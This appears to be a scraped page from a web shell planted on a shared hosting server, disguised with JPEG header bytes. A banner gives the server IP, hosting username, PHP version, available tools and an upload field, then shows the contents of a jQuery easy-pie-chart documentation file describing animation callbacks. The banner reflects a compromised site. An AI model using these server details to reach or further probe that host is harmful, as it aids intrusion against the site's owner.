����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.190.207.156 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/assets/admin/vendors/jquery.easy-pie-chart/docs/ |
Upload File : |
All callbacks will only be called if `animate` is not `false`. <table> <tr> <th>Callback(params, ...)</th> <th>Description</th> </tr> <tr> <td><strong>onStart(from, to)</strong></td> <td>Is called at the start of any animation.</td> </tr> <tr> <td><strong>onStep(from, to, currentValue)</strong></td> <td>Is called during animations providing the current value (the method is scoped to the context of th eplugin, so you can access the DOM element via <code>this.el</code>).</td> </tr> <tr> <td><strong>onStop(from, to)</strong></td> <td>Is called at the end of any animation.</td> </tr> </table>